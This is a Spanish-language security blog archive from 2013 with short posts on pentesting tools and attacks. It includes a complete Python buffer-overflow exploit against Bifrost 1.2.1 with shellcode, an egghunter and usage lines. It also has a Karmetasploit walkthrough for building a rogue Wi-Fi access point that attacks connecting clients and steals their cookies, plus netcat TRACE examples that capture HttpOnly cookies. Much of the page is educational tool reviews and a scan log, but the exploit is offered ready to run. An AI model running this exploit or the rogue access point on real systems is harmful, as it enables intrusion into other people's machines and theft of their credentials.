468x60 Ads


viernes, 29 de noviembre de 2013

Cross Site Tracing (XST)


Cross Site Tracing (XST)

Cross Site Tracing - XST es una vulnerabilidad que se deriva de XSS y es generada por el método  HTTP TRACE que muestra las cookies que el navegador tiene para el dominio.

El método TRACE se utiliza principalmente para fines de depuración, pero Jeremiah Grossman descubrió en 2003 que se puede llegar a montar un ataque, que es conocido como XST.

El método HTTP TRACE. Este método se utiliza/ba para debugging de los servidores Web y viene activado por defecto en muchos servers. Lo único que hace es repetir toda información enviada por el cliente al server, es algo así como un echo. Un ejemplo del método Trace sería como sigue:

  $ nc 192.168.1.1 80 -vvv
    TRACE / HTTP/1.1
    Host: prueba
    User-Agent: prueba
    HTTP/1.1 200 OK
    Server: Microsoft-IIS/5.0
    Date: Mon, 07 Dec 2009 17:07:16 GMT
    X-Powered-By: ASP.NET
    Content-Type: message/http
    Content-Length: 50
    TRACE / HTTP/1.1
    Host: prueba
    User-Agent: prueba

Como se observa, el servidor responde exactamente lo mismo que le enviamos en el pedido. La parte útil para el ataque, es que si armamos un pedido HTTP TRACE desde el browser a una página en la cual se utilizan cookies, el servidor nos responderá copiando las cookies de regreso. Por ejemplo, podríamos obtener el siguiente comportamiento:

$ nc 192.168.1.1 80 -vvv
    TRACE / HTTP/1.1
    Host: prueba
    Cookie: SID=13klj12jhlkjhdf09kasdn
    HTTP/1.1 200 OK
    Server: Microsoft-IIS/5.0
    Date: Mon, 07 Dec 2009 17:15:26 GMT
    X-Powered-By: ASP.NET
    Content-Type: message/http
    Content-Length: 73
    TRACE / HTTP/1.1
    Host: prueba
    Cookie: SID=13klj12jhlkjhdf09kasdn

Si podemos obtener la cookie enviada por el browser a través de XSS, para qué necesitamos el método TRACE? bueno resulta ser que hay casos en los que no es posible obtener las cookies utilizando JavaScript (u otro lenguaje script ejecutado en el browser).

En browsers como IE6 SP1 y posteriores o Firefox 2.0.0.5 y posteriores, existe una opción de seguridad llamada HttpOnly cookies. Cuando un servidor web envía el parámetro HttpOnly dentro de las cookies, el browser no debería permitir que las cookies sean accesibles utilizando scripts como JavaScript. Esto es, si la opción HttpOnly está activada, una llamada a document.cookie nos devolverá vacío, aún cuando existan cookies. Utilizando esta propiedad se previene el robo de cookies explotando vulnerabilidades XSS, lo cual es muy bueno.

Aca es donde entra en juego el XST. A través de XST se pueden obtener cookies aún cuando está activada la característica HttpOnly. Si armamos un pedido HTTP TRACE desde el browser, éste incorporará la cookie como parte del header (la cual todavía no podemos acceder). Ahora, cuando el servidor responda al pedido TRACE, éste incluirá la cookie como parte de la respuesta….

Cómo es posible armar un pedido HTTP TRACE utilizando JavaScript? distintos browsers tienen distintos métodos. Para ejemplificar, les dejo los métodos usados por los dos browsers más conocidos, IE y Firefox.

Una forma de realizar este trabajo en Internet Explorer es utilizando el control ActiveX XMLHTTP. Un ejemplo de cómo utilizar esto para obtener cookies es el siguiente (tomado del paper CROSS-SITE TRACING (XST) de Jeremiah Grossman):


    < input onclick="”sendTrace();”" request="" trace="" type="BUTTON" value="”Send" />

En firefox la función a utilizar es muy similar:


    < INPUT TYPE=BUTTON OnClick=”sendTrace();” VALUE=”Send Trace Request”>

El uso de estas funciones tienen una restricción: no permiten al browser conectarse a otro dominio que no sea el de la página que está mostrando. Pero esto igualmente no es problema para realizar el ataque.

Jeremiah Grossman: "Cross Site Tracing (XST)


jueves, 28 de noviembre de 2013

IDAscope La Navaja Suiza Para Reversers

 
IDAscope La Navaja Suiza Para Reversers 
 
IDAscope es una extensión de IDAPro para facilitar la ingeniería inversa sobre malware.

Ofrece tres funcionalidades principales:

Function Inspection. Esta función implementa la capacidad de serie específica de etiqueta de llamada API. La API de seguimiento podría seleccionada y modificada en un archivo de configuración específico (config.json). IDAscope le alertará cuando ocurrirán patrones específicos de la API. La funcionalidad de control de función permite otra característica super llamado: bloque basic para colorear. Haber coloreado bloques en IDAPro es realmente útil para aprisa a entender cuál es el propósito de la pieace analizada del código. Lo que es común, ahora es colapsar bloques dando nombres de nivel altos. 

IDAscope ofrece la posibilidad de colorear automáticamente bloquea haciendo forma más eficiente en reconoce bloques inútiles. Código de función de conversión y cambio de nombre automático de funciones de envoltura son funcionalidades adicionales útiles así.

WinAPI Browsing. Obviamente para windows es increíblemente útil tener manual de referencia de la API de Windows. Aquí, usando la API de IDAscope la referencia está al lado de tus ojos para la búsqueda rápida e inteligente. La siguiente imagen muestra ambos:

Crypto Identification. Tal vez la funcionalidad más útil para todos los reversers, se utiliza para luchar con múltiples herramientas para averiguar qué algoritmo de cifrado se ha utilizado en el código.

IDAscope detecta el algoritmo usado basando su análisis en la relación de la aritmética / instrucciones de lógica para todas las instrucciones en un bloque básico.



miércoles, 27 de noviembre de 2013

OWASP GoatDroid


OWASP GoatDroid

GoatDroid es un proyecto que ayudará a educar en materia de seguridad a los desarrolladores de aplicaciones Android.

Se trata de un entorno completamente funcional para aprender acerca de las vulnerabilidades y los fallos de seguridad en la extendida plataforma. El framework y la aplicación están basadas completamente en Java. No es necesario instalar un servidor web externo o un contenedor, aunque si necesitaremos MySQL, el SDK de Android y Eclipse. Cada servicio web corre en instancias Jetty embebidas y utiliza la implementación Jersey de JAX-RS.

Los pasos para su instalación son muy sencillos:

1. Como comentábamos, es necesario tener previamente instalado Mysql, JDK, Eclipse y Android SDK.

2. Lo primero que haremos es crear un dispositivo virtual con un nivel 7 de API como mínimo.


3. Después importamos la base de datos FourGoats en MySQL: 'mysql -u username -p &lt; fourgoats.sql'. El fichero fourgoats.sql está dentro del directorio /databases de la carpeta GoatDroid.

4. Dentro de MySQL ejecutamos: 'create user 'goatboy'@'localhost' identified by 'goatdroid'' (si queremos indicar otra contraseña tendremos que cambiarla en el código fuente de goatdroid.jar y re-exportar.

5. En MySQL, ejecutamos : 'grant insert, delete, update, select on fourgoats.*  to goatboy@localhost'

6. Ahora que la base de datos está configurada con las tablas y los datos de ejemplo, arrancamos goatdroid.jar haciendo clic o ejecutamos 'java -jar goatdroid.jar'


7. En el menú seleccionamos 'Configure y Edit' y añadimos las rutas de Eclipse y del SDK y los dispositivos virtuales:


8. Desplegamos la carpeta FourGoats en Apps, seleccionamos v1 y pulsamos el botón 'Iniciar servicio web':


9. Pulsamos el botón para iniciar el emulador y seleccionamos nuestro dispositivo virtual:


10. Una vez arrancado el dispositivo virtual, instalamos la aplicación pulsando el botón "Push App To Device". En caso de que fallara, podemos instalar el apk nosotros directamente: 'D:\Android\android-sdk\platform-tools&gt;adb.exe install "d:\OWASP GoatDroid v0.1.2   BETA\goatdroid_apps\FourGoats\v1\android_app\FourGoats- Android Application.apk"'


11. Pinchamos en el icono creado para iniciar la aplicación y, antes de empezar a hacer nada, es necesario especificar el host y el puerto para conectarnos al servicio web. Para ello, pulsamo el botón 'Menú' y seleccionamos "Destination Info".


12. Por último, registramos y creamos una cuenta y nos loggeamos.



Se pueden descubrir vulnerabilidades de tipo:
                      
Client-Side Injection
Server-Side           
Authorization Issues
Side Channel Information Leakage
Insecure           
Data Storage
Privacy Concerns                  


martes, 26 de noviembre de 2013

Karmetasploit


Karmetasploit

Sirve para crear puntos de acceso falsos, capturar contraseñas, recopilar infomación, y llevar a los ataques de navegador contralos clientes.

Cuando un usuario se conecta a nuestro AP Fake, la dirección IP la estará asignando el servicio DHCP, y posteriormente karmetasploit intentará ejecutar todos los exploits sobre la maquina objetivo en busca de alguna vulnerabilidad e intentará conseguir una sesión meterpreter.

Descargamos Karmetasploit

Instalamos dhcpd3-server

sudo apt-get install isc-dhcp-server

Una ves instalado procederemos a configurarlo, Quedando de la siguiente manera.

#
# Sample configuration file for ISC dhcpd for Debian
#
# Attention: If /etc/ltsp/dhcpd.conf exists, that will be used as
# configuration file instead of this file.
#
#

# The ddns-updates-style parameter controls whether or not the server will
# attempt to do a DNS update when a lease is confirmed. We default to the
# behavior of the version 2 packages ('none', since DHCP v2 didn't
# have support for DDNS.)
ddns-update-style none;

# option definitions common to all supported networks...
option domain-name "10.0.0.1";
option domain-name-servers 10.0.0.1;

default-lease-time 60;
max-lease-time 72;

# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
#authoritative;

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;

# No service will be given on this subnet, but declaring it helps the 
# DHCP server to understand the network topology.

#subnet 10.0.0.0 netmask 255.255.255.0 {
#}

# This is a very basic subnet declaration.

#subnet 10.0.0.0 netmask 255.255.255.0 {
#  range 10.0.0.100 10.0.0.254;
#  option routers 10.0.0.1;
#}

Luego procedemos a editar /msf/data/exploits/capture/http/sites.txt donde están almacenados todos los sitios en los que metasploit intentará robar cookies.

Ahora comenzamos poniendo nuestra tarjeta en modo monitor, en mi caso es la wlan0.

airmon-ng start wlan0

Se activará así la interfaz mon0 la cual podemos cambiarle la dirección MAC si lo creemos necesario:

ifconfig mon0 down && macchanger -r mon0 && ifconfig mon0 up

Una vez que la interfaz está lista ya podemos crear nuestro punto de acceso con la ayuda de airbase-ng, tecleemos lo siguiente en la consola:

airbase-ng -P -C 30 -c 6 -e “red_falsa” mon0

Donde mon0 es nuestra tarjeta en modo monitor y “red_falsa” es el nombre que queramos darle a nuestra red.

Este paso anterior nos creará una nueva interfaz llamada at0 a la cual vamos a darle una ip y activamos el servidor dhcp desde otra terminal:

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
dhcpd -cf /etc/dhcp/dhcpd.conf at0

Ahora iniciamos mestasploit con karma.

msfconsole -r karma.rc

Al iniciar karmetasploit les aparecerá:




lunes, 25 de noviembre de 2013

zAnti - Android Network Toolkit


zAnti - Android Network Toolkit

zAnti es la versión más actual de nombre código anti (Android Network Toolkit). Es una herramienta que vio la luz por primera vez en el 2011 durante DEFCON y que integra una gran variedad de utilidades para auditoría, permite obtener una evaluación de la red completa por el clic de un botón y cuenta con las siguientes características:

  • Búsqueda de vulnerabilidades comunes

  • Obtener un detallado informe basado en la nube para corregir las vulnerabilidades reconocidas incluyendo análisis inteligente de fallos críticos.

  • Realizar auditorías contraseña para comprobar la complejidad de contraseñas.

  • Encontrar errores de configuración de dispositivos de firewall mediante la detección de puertos abiertos.

  • Compruebe si la red es vulnerable a MITM y del lado del cliente común, las vulnerabilidades del lado del servidor.

  • Descubre tráfico inseguro y cookies que afectan la privacidad de la red.

  • Visualice su red mediante la observación de las imágenes capturadas, grabadas desde la comunicación de red no segura. 


zAnti - Android Network Toolkit


viernes, 22 de noviembre de 2013

Bifrost 1.2.1 - Remote Buffer OverFlow Vulnerability


Bifrost 1.2.1 - Remote Buffer OverFlow Vulnerability

Una vulnerabilidad buffer overflow o desbordamiento de búfer es un ataque diseñado para activar la ejecución de código arbitrario en software cuando enviamos a este mayor tamaño de datos del que puede recibir.

Exploit Bifrost 1.2.1:

#!/usr/bin/python2.7
#By : Mohamed Clay 

import socket

from time import sleep

from itertools import izip, cycle

import base64

import sys

     

def rc4crypt(data, key):

        x = 0

        box = range(256)

        for i in range(256):

            x = (x + box[i] + ord(key[i % len(key)])) % 256

            box[i], box[x] = box[x], box[i]

        x = 0

        y = 0

        out = []

        for char in data:

            x = (x + 1) % 256

            y = (y + box[x]) % 256

            box[x], box[y] = box[y], box[x]

            out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))

         

        return ''.join(out)

     

def bif_len(s):

        while len(s)<8:

             s=s+"00"

        return s

     

def header(s):

          a=(s[0]+s[1]).decode("hex")

          a+=(s[2]+s[3]).decode("hex")

          a+=(s[4]+s[5]).decode("hex")

          a+=(s[5]+s[6]).decode("hex")

          return a

     

def random():   

        a=""

        for i in range(0,8):

            a+="A"*1000+"|"

        return a

     

def usage():

     

       print "\n\n\t***************************"

       print "\t*    By : Mohamed Clay    *"

       print "\t*  Bifrost 1.2.1 Exploit  *"

       print "\t***************************\n"

       print "\t  Usage : ./bifrost_rfo host port"

       print "\tExample : ./bifrost_rfo 192.168.1.10 81\n\n"

     

     

if len(sys.argv)!=3:

        usage()

        exit()

     

HOST=sys.argv[1]

PORT=int(sys.argv[2])

     

key="\xA3\x78\x26\x35\x57\x32\x2D\x60\xB4\x3C\x2A\x5E\x33\x34\x72\x00"

     

xor="\xB2\x9C\x51\xBB" # we need this in order to bypass 0046A03E function

eip="\x53\x93\x3A\x7E" # jmp esp User32.dll

     

egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x77\x30\x30\x74\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";

     

    #calc.exe shellcode (badchars "\x00")

     

buf ="\xb8\x75\xd3\x5c\x87\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9"

buf +="\xb1\x33\x31\x43\x12\x83\xeb\xfc\x03\x36\xdd\xbe\x72\x44"

buf +="\x09\xb7\x7d\xb4\xca\xa8\xf4\x51\xfb\xfa\x63\x12\xae\xca"

buf +="\xe0\x76\x43\xa0\xa5\x62\xd0\xc4\x61\x85\x51\x62\x54\xa8"

buf +="\x62\x42\x58\x66\xa0\xc4\x24\x74\xf5\x26\x14\xb7\x08\x26"

buf +="\x51\xa5\xe3\x7a\x0a\xa2\x56\x6b\x3f\xf6\x6a\x8a\xef\x7d"

buf +="\xd2\xf4\x8a\x41\xa7\x4e\x94\x91\x18\xc4\xde\x09\x12\x82"

buf +="\xfe\x28\xf7\xd0\xc3\x63\x7c\x22\xb7\x72\x54\x7a\x38\x45"

buf +="\x98\xd1\x07\x6a\x15\x2b\x4f\x4c\xc6\x5e\xbb\xaf\x7b\x59"

buf +="\x78\xd2\xa7\xec\x9d\x74\x23\x56\x46\x85\xe0\x01\x0d\x89"

buf +="\x4d\x45\x49\x8d\x50\x8a\xe1\xa9\xd9\x2d\x26\x38\x99\x09"

buf +="\xe2\x61\x79\x33\xb3\xcf\x2c\x4c\xa3\xb7\x91\xe8\xaf\x55"

buf +="\xc5\x8b\xed\x33\x18\x19\x88\x7a\x1a\x21\x93\x2c\x73\x10"

buf +="\x18\xa3\x04\xad\xcb\x80\xfb\xe7\x56\xa0\x93\xa1\x02\xf1"

buf +="\xf9\x51\xf9\x35\x04\xd2\x08\xc5\xf3\xca\x78\xc0\xb8\x4c"

buf +="\x90\xb8\xd1\x38\x96\x6f\xd1\x68\xf5\xee\x41\xf0\xd4\x95"

buf +="\xe1\x93\x28"

     

     

raw=(1000-533-len(egghunter))*"\x90"

raw2=(1000-8-len(buf))*"\x41"+"|"

command=30

     

tmp=hex(command).split("0x")[1]

data=tmp.decode("hex")+"F"*2+" "*511+xor+"C"*8+eip+"A"*12+egghunter+raw+"|"+" "*1000+"|"+"w00tw00t"+buf+raw2+random()

out=rc4crypt(data,key)

l=header(bif_len(str(hex(len(data))).split("0x")[1]))

out=l+out

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((HOST, PORT))

s.sendall(out)

print "\n[*] By : Mohamed Clay"

print "[*] Exploit completed\n" 

Ejemplo de uso:

./bifrost_rfo 192.168.1.10 81



miércoles, 20 de noviembre de 2013

Grampus


Grampus

Grampus herramienta que facilita la recopilación de información a traves de la extracción de metadatos de diferentes documentos y tareas de finger/foot printing

Características:

- Extracción de metadatos de documentos e imágenes, formatos soportados : Openoffice/Libreoffice, Office 2007, Office 2003, PDF, jpg, flv y gif.
- Eliminación de metadatos extraidos de diferentes documentos e imágenes.
- Tres tipos de Crawlers, entre los que se encuentra un crawler de documentos (por extensión) usando Google hacking.
- Para la tarea del fingerprinting se cuenta con un server banner y un escaneo mediante Shodan usando su api

El proyecto se divide de esta manera:

- Forensic Grampus
- Anti-Forensic Grampus
- Grampus
- Anti Grampus

- Forensic Grampus :
Forensic Grampus es una herramienta forense que pretende extraer y analizar los metadatos encontrados en documentos, imagenes , archivos, aplicaciones...

Esta totalmente programado en Python por lo que es la perfecta alternativa multiplataforma para Forensic FOCA superando a esta con creces en cuanto a extensiones soportadas.

- Anti-Forensic Grampus :
Anti Forensic Grampus es una herramienta ANTI forense que pretende eliminar o modificar aquellos metadatos encontrados en documentos, imagenes, archivos, aplicaciones...

Esta totalmente programada en Python por lo que es una buena alternativa a Metashield Protector proporcionando protección contra las mismas extensiones que podemos analizar en Forensic Grampus.

- Grampus :
Grampus es una herramienta para la automatización de procesos fingerprinting en los trabajos de auditoria web sumandole a esto la posibilidad de extraer y analizar los documentos públicos encontrados en la propia página a la que se le realiza la auditoria convirtiendose así en la alternativa multiplataforma Perfecta para FOCA de Chema Alonso y su equipo.


- Anti - Grampus :
Anti Grampus es una herramienta creada para evitar exponer datos o credenciales que puedan ser de utilidad en ese proceso de fingerprinting volviendo así a nuestro sitio más seguro.

Esta totalmente programado en Python así como las otras 3 herramientas y a diferencia de las demas esta surge como contramedida y no como una alternativa.

Desarrolladores:

- @The_Pr0ph3t (Pr0ph3t)
- @SankoSK (Sanko)
- @sniferl4bs (Snifer)
- @don_once (11Sep)
- OverxFlow

Grampus bitbucket
Descarga Grampus
User Guide Grampus

Iniciar Grampus

stuxnet@stuxnet:/media/Stuxnet/Pentesting/Grampus$ ls
build           Grampus.py      ms_Crawler.py     ms_Images.pyc     pyPdf
crawler.py      Grampus.pyc     ms_Crawler.pyc    ms_Others.py      recursos
directoio.py    ID3.py          ms_Documents.py   ms_Video.py       saves
DuckCrawler.py  ID3.pyc         ms_Documents.pyc  ms_Video.pyc      setup.py
flvlib          MainGrampus.py  ms_Finger.py      OleFileIO_PL.py   shodan
gif.py          ms_Audio.py     ms_Finger.pyc     OleFileIO_PL.pyc  Thread.py
gif.pyc         ms_Audio.pyc    ms_Images.py      pyexiv2           Thread.pyc
stuxnet@stuxnet:/media/Stuxnet/Pentesting/Grampus$ python MainGrampus.py
QWidget::setLayout: Attempting to set QLayout "" on WindowGrampus "", which already has a layout

Screens:




martes, 19 de noviembre de 2013

dSploit - Android Network Penetration Suite

 
dSploit - Android Network Penetration Suite
 
dSploit es una suite para Android para el análisis y pentesting, que tiene como objetivo ofrecer a los profesionales la de seguridad de TI profesional para realizar evaluación contemplaba red más avanzados y completos de seguridad en un dispositivo móvil.

Una vez que inicie la aplicación, el usuario será capaz de mapear su red, identificar los sistemas operativos y servicios que se ejecutan en otros parámetros, la búsqueda de vulnerabilidades conocidas, procedimientos de conexión de los sistemas de autenticación más comunes, realizar ataques de MITM y por lo tanto tiene el control total del tráfico de la red, tanto sniffer pasivo con una contraseña y disector de los protocolos más comunes que la manipulación activa de paquetes en tiempo real desde y hacia otras máquinas en nuestro propio red, etc, etc.

Detalles:


Los requisitos para instalar y usar dSploit son:

Un dispositivo Android con al menos la versión 3.0 del sistema operativo.
El dispositivo debe ser necesariamente rooteado.
Una instalación completa de busybox (por lo tanto todos los binarios instalados, que no forman parte de eso).

dSploit - Android Network Penetration Suite 

Video Demostrativo:



lunes, 18 de noviembre de 2013

Metagoofil


Metagoofil

Metagoofil es una herramienta de recolección de información diseñada para la extracción de metadatos que se pueden encontrar en algún archivo alojado en una web puede recoger información de archivos públicos (pdf, doc, xls, ppt, docx, pptx, xlsx) pertenecientes a una empresa objetivo.

La herramienta realiza una búsqueda en Google para identificar y descargar los documentos en el disco local y luego extraer los metadatos de bibliotecas diferentes, como Hachoir, PdfMiner y otros. Con los resultados se generará un informe con los nombres de usuario, versiones de software y servidores o nombres de máquinas.

Uso: opciones de metagoofil


-d: dominio para buscar
-t: tipo de archivo a descargar (pdf, doc, xls, ppt, odp, ods, docx, xlsx, pptx)
-l: límite de los resultados de la búsqueda (por defecto 200)
-h: Trabajo con documentos en el directorio (uso “sí” para el análisis local)
-n: El límite de archivos para descargar
-o: directorio de trabajo
-f: archivo de salida

python metagoofil.py -d microsoft.com -t doc,pdf -l 200 -n 50 -o microsoftfiles -f results.html

python metagoofil.py -h yes -o microsoftfiles -f results.html




viernes, 15 de noviembre de 2013

Golismero


Golismero

Golismero es una herramienta de seguridad desarrollada por OWASP orientada a realizar auditorías de páginas web para buscar posibles agujeros de seguridad existentes en estas, aunque también podría ser utilizado para buscar fallos en cualquier otro tipo de servicios (redes, servidores, etc.)

La herramienta puede recopilar y analizar resultados recogidos por otras herramientas de seguridad como sqlmap, xsser, openvas, dnsrecon, theharvester, etc.

Descarga Golismero:
git clone https://github.com/golismero/golismero
cd golismero
python golismero.py -h

Uso básico Golismero:

python golismero.py http://stuxnethack.tk -o prueba.txt

Lo anterior nos guardara los resultados obtenidos del anális en el archivo prueba.txt que se guardará en la carpeta donde estamos ejecutando Golismero.

stuxnet@stuxnet:/media/Stuxnet/Pentesting/golismero$ python golismero.py http://stuxnethack.tk -o prueba.txt

/----------------------------------------------\
| GoLismero 2.0.0b1 - The Web Knife            |
| Contact: golismero.project<@>gmail.com       |
|                                              |
| Daniel Garcia Garcia a.k.a cr0hn (@ggdaniel) |
| Mario Vilas (@Mario_Vilas)                   |
\----------------------------------------------/

GoLismero started at 2013-11-14 21:21:55.395471
[*] GoLismero: Audit name: golismero-DLTy3hgk
[*] GoLismero: Audit database: golismero-DLTy3hgk.db
[*] GoLismero: Added 3 new targets to the database.
[*] GoLismero: Launching tests...
[*] OS fingerprinting plugin: Started.
[*] Robots.txt Analyzer: Started.
[*] OS fingerprinting plugin: Started.
[*] theHarvester: Started.
[*] DNS zone transfer: Started.
[*] DNS subdomain bruteforcer: Started.
[*] DNS analyzer: Started.
[*] Web Server fingerprinting plugin: Started.
[*] Web Spider: Started.
[*] Suspicious URL: Started.
[!] OS fingerprinting plugin: [!] You can't run the platform detection plugin if you're not root.
[*] OS fingerprinting plugin: Finished.
[*] theHarvester: Searching keyword 'stuxnethack.tk' in google
[*] theHarvester: 0.00% percent done...
[*] Web Spider: Spidering URL: 'http://stuxnethack.tk/'
[*] Suspicious URL: Finished.
[*] DNS analyzer: Starting DNS analyzer plugin
[*] DNS analyzer: 0.00% percent done...
[*] DNS subdomain bruteforcer: 0.05% percent done...
[*] DNS subdomain bruteforcer: 0.10% percent done...
[*] DNS subdomain bruteforcer: 0.15% percent done...
[*] DNS subdomain bruteforcer: 0.20% percent done...
[*] DNS subdomain bruteforcer: 0.26% percent done...
[*] DNS subdomain bruteforcer: 0.36% percent done...
[*] DNS subdomain bruteforcer: 0.41% percent done...
[*] DNS subdomain bruteforcer: 0.47% percent done...
[*] DNS subdomain bruteforcer: 0.31% percent done...
[*] theHarvester: Searching keyword 'stuxnethack.tk' in bing
[*] theHarvester: 20.00% percent done...
[*] DNS analyzer: 3.70% percent done...
[*] DNS subdomain bruteforcer: 0.52% percent done...
[*] DNS analyzer: 7.40% percent done...
[*] DNS analyzer: 11.11% percent done...
[*] DNS subdomain bruteforcer: 0.57% percent done...
[*] DNS subdomain bruteforcer: 0.62% percent done...
[*] DNS subdomain bruteforcer: 0.68% percent done...
[*] DNS subdomain bruteforcer: 0.73% percent done...
[*] DNS subdomain bruteforcer: 0.78% percent done...
[*] DNS subdomain bruteforcer: 0.83% percent done...
[*] DNS subdomain bruteforcer: 0.89% percent done...
[*] DNS analyzer: 14.81% percent done...
[*] DNS subdomain bruteforcer: 0.94% percent done...
[*] DNS subdomain bruteforcer: 0.99% percent done...
[*] DNS subdomain bruteforcer: 1.04% percent done...
[*] DNS analyzer: 18.51% percent done...
[*] DNS analyzer: 22.22% percent done...
[*] DNS subdomain bruteforcer: 1.10% percent done...
[*] DNS subdomain bruteforcer: 1.15% percent done...
[*] DNS subdomain bruteforcer: 1.20% percent done...
[*] DNS subdomain bruteforcer: 1.25% percent done...
[*] DNS analyzer: 25.92% percent done...
[*] DNS subdomain bruteforcer: 1.31% percent done...
[*] DNS subdomain bruteforcer: 1.36% percent done...
[*] DNS subdomain bruteforcer: 1.41% percent done...
[*] DNS subdomain bruteforcer: 1.46% percent done...
[*] DNS subdomain bruteforcer: 1.52% percent done...
[*] DNS analyzer: 29.62% percent done...
[*] DNS analyzer: 33.33% percent done...
[*] DNS subdomain bruteforcer: 1.57% percent done...
[*] DNS subdomain bruteforcer: 1.62% percent done...
[*] DNS analyzer: 37.03% percent done...
[*] DNS subdomain bruteforcer: 1.67% percent done...
[*] DNS subdomain bruteforcer: 1.73% percent done...
[*] DNS analyzer: 40.74% percent done...
[*] DNS subdomain bruteforcer: 1.78% percent done...
[*] DNS subdomain bruteforcer: 1.83% percent done...
[*] DNS subdomain bruteforcer: 1.88% percent done...
[*] DNS subdomain bruteforcer: 1.94% percent done...
[*] DNS subdomain bruteforcer: 1.99% percent done...
[*] DNS analyzer: 44.44% percent done...
[*] DNS subdomain bruteforcer: 2.04% percent done...
[*] DNS analyzer: 48.14% percent done...
[*] DNS subdomain bruteforcer: 2.09% percent done...
[*] DNS subdomain bruteforcer: 2.14% percent done...
[*] DNS analyzer: 51.85% percent done...
[*] DNS subdomain bruteforcer: 2.20% percent done...
[*] DNS subdomain bruteforcer: 2.25% percent done...
[*] DNS subdomain bruteforcer: 2.30% percent done...
[*] DNS analyzer: 55.55% percent done...
[*] DNS subdomain bruteforcer: 2.35% percent done...
[*] DNS subdomain bruteforcer: 2.41% percent done...
[*] DNS subdomain bruteforcer: 2.46% percent done...
[*] DNS subdomain bruteforcer: 2.51% percent done...
[*] DNS analyzer: 59.25% percent done...
[*] DNS analyzer: 62.96% percent done...
[*] DNS subdomain bruteforcer: 2.56% percent done...
[*] DNS subdomain bruteforcer: 2.62% percent done...
[*] DNS analyzer: 66.66% percent done...
[*] DNS subdomain bruteforcer: 2.67% percent done...
[*] DNS subdomain bruteforcer: 2.72% percent done...
[*] DNS subdomain bruteforcer: 2.77% percent done...
[*] DNS subdomain bruteforcer: 2.83% percent done...
[*] DNS subdomain bruteforcer: 2.88% percent done...
[*] DNS subdomain bruteforcer: 2.93% percent done...
[*] DNS subdomain bruteforcer: 2.98% percent done...
[*] DNS subdomain bruteforcer: 3.04% percent done...
[*] DNS subdomain bruteforcer: 3.09% percent done...
[*] DNS subdomain bruteforcer: 3.14% percent done...
[*] DNS subdomain bruteforcer: 3.19% percent done...
[*] DNS subdomain bruteforcer: 3.25% percent done...
[*] DNS subdomain bruteforcer: 3.30% percent done...
[*] DNS subdomain bruteforcer: 3.35% percent done...
[*] theHarvester: Searching keyword 'stuxnethack.tk' in pgp
[*] theHarvester: 40.00% percent done...
[*] DNS zone transfer: Finished.
[*] DNS subdomain bruteforcer: 3.40% percent done...
[*] DNS subdomain bruteforcer: 3.46% percent done...
[*] DNS subdomain bruteforcer: 3.51% percent done...
[*] DNS subdomain bruteforcer: 3.56% percent done...
[*] DNS subdomain bruteforcer: 3.61% percent done...
[*] DNS subdomain bruteforcer: 3.67% percent done...
[*] DNS subdomain bruteforcer: 3.72% percent done...
[*] DNS subdomain bruteforcer: 3.77% percent done...
[*] DNS subdomain bruteforcer: 3.82% percent done...
[*] DNS subdomain bruteforcer: 3.88% percent done...
[*] DNS subdomain bruteforcer: 3.93% percent done...
[*] DNS subdomain bruteforcer: 3.98% percent done...
[*] theHarvester: Searching keyword 'stuxnethack.tk' in exalead
[*] theHarvester: 60.00% percent done...
[*] DNS subdomain bruteforcer: 4.03% percent done...
[*] DNS subdomain bruteforcer: 4.09% percent done...
[*] DNS subdomain bruteforcer: 4.14% percent done...
[*] DNS subdomain bruteforcer: 4.19% percent done...
[*] DNS subdomain bruteforcer: 4.24% percent done...
[*] DNS subdomain bruteforcer: 4.29% percent done...
[*] DNS subdomain bruteforcer: 4.35% percent done...
[*] DNS subdomain bruteforcer: 4.40% percent done...
[*] DNS subdomain bruteforcer: 4.45% percent done...
[*] DNS analyzer: 70.37% percent done...
[*] DNS subdomain bruteforcer: 4.50% percent done...
[*] DNS subdomain bruteforcer: 4.56% percent done...
[*] DNS analyzer: 74.07% percent done...
[*] DNS subdomain bruteforcer: 4.61% percent done...
[*] DNS subdomain bruteforcer: 4.66% percent done...
[*] DNS subdomain bruteforcer: 4.71% percent done...
[*] DNS analyzer: 77.77% percent done...
[*] DNS subdomain bruteforcer: 4.77% percent done...
[*] DNS analyzer: 81.48% percent done...
[*] DNS subdomain bruteforcer: 4.82% percent done...
[*] DNS subdomain bruteforcer: 4.87% percent done...
[*] DNS subdomain bruteforcer: 4.92% percent done...
[*] DNS subdomain bruteforcer: 4.98% percent done...
[*] DNS subdomain bruteforcer: 5.03% percent done...
[*] DNS analyzer: 85.18% percent done...
[*] DNS subdomain bruteforcer: 5.08% percent done...
[*] DNS analyzer: 88.88% percent done...
[*] DNS subdomain bruteforcer: 5.13% percent done...
[*] DNS subdomain bruteforcer: 5.19% percent done...
[*] DNS subdomain bruteforcer: 5.24% percent done...
[*] DNS analyzer: 92.59% percent done...
[*] DNS subdomain bruteforcer: 5.29% percent done...
[*] DNS subdomain bruteforcer: 5.34% percent done...
[*] DNS subdomain bruteforcer: 5.40% percent done...
[*] DNS subdomain bruteforcer: 5.45% percent done...
[*] DNS analyzer: 96.29% percent done...
[*] DNS subdomain bruteforcer: 5.50% percent done...
[*] DNS subdomain bruteforcer: 5.55% percent done...
[*] DNS subdomain bruteforcer: 5.61% percent done...
[*] DNS analyzer: Ending DNS analyzer plugin, found 7 registers
[*] theHarvester: Started.
[*] DNS zone transfer: Started.
[*] DNS subdomain bruteforcer: Started.
[*] DNS analyzer: Started.
[*] DNS analyzer: Finished.
[*] DNS subdomain bruteforcer: 5.66% percent done...
[*] DNS subdomain bruteforcer: 5.71% percent done...
[*] DNS subdomain bruteforcer: 5.76% percent done...
[*] DNS subdomain bruteforcer: 5.82% percent done...
[*] DNS subdomain bruteforcer: 5.87% percent done...
[*] DNS subdomain bruteforcer: 5.92% percent done...
[*] DNS subdomain bruteforcer: 5.97% percent done...
[*] DNS subdomain bruteforcer: 6.03% percent done...
[*] DNS subdomain bruteforcer: 6.08% percent done...
[*] DNS subdomain bruteforcer: 6.13% percent done...
